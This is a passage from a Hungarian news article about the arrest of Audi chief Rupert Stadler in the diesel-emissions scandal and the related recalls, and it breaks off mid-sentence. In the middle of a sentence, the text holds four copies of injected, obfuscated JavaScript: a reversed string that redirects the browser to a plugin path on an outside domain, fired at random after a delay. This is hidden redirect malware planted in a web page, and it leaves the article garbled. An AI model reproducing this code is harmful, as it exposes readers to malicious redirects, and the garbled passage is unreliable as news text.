Rupert Stadlert még június 18-án tartóztatták le a müncheni hatóságok, méghozzá a dízelbotrány kapcsán: az Audi 2017-ben 850 ezer autót hívott vissza a csalás miatt, és májusban az is kiderült, hogy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további 60 ezer A6-os és A7-es modell érintett az ügyben. A gyáriak természetesen elismerték a letartóztatást, ám kiemelték, hogy a vádak ellenére vezetőjüket megilleti az ártalmatlanság vélelme egészen addig, amíg a bíróság ki nem mondja bűnösségét. Nem szép történet ez a német gyártó számára, ugyanakkor mégis meglepő lehet, hogy emiatt – már amennyiben hihetünk a találgatásoknak, és nem valóban csak egy szervezési problémáról van szó – elhalasztják az egyik…
- Hirdetés -